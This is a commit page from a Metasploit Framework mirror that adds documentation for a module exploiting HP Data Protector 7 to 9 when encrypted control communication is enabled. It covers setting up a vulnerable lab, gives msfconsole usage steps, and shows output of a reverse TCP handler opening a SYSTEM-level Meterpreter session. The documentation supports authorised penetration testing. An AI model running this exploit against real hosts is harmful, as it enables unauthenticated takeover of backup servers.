infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add hp_dataprotector_encrypted_comms.md

bug/bundler_fix
wchen-r7 2016-06-06 22:45:17 -05:00
parent 60c60bf004
commit d8d6ab3ae8
1 changed files with 75 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

75
documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md Normal file
View File

@ -0,0 +1,75 @@
HP Data Protector is an automated backup and recovery software for single-server to enterprise
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
and Linux operating systems.
While the server is using Encrypted Control Communication, HP Data Protector allows a remote
attacker to gain access without authentication, and gain arbitrary code execution under the
context of SYSTEM.
## Vulnerable Application
HP Data Protector versions 7, 8, and 9 are known to be affected.
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
## Verification Steps
**Installing HP Data Protector**
Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
After setting up the domain controller, double-click on the HP Data Protector installer, and you
should see this screen:
![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
Click on **Install Data Protector**. And then the installer should ask you which installation type:
![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
**Enabling Encrypted Communication**
After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
Data Protector GUI:
![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
right, click on that.
![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
sure that is checked. And then click **Apply**
**Using hp_dataprotector_encrypted_comms**
After the encrypted communication is enabled, you are ready to use
hp_dataprotector_encrypted_comms. Here is what you do:
1. Start msfconsole
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
3. Do: ```set RHOST [IP ADDRESS]```
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
5. Set other options as needed
6. Do: ```exploit```, and you should receive a session like the following:
```
msf exploit(hp_dataprotector_encrypted_comms) > run
[*] Started reverse TCP handler on 172.16.23.1:4444
[*] 172.16.23.173:5555 - Initiating connection
[*] 172.16.23.173:5555 - Establishing encrypted channel
[*] 172.16.23.173:5555 - Sending payload
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
[*] Sending stage (957999 bytes) to 172.16.23.173
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```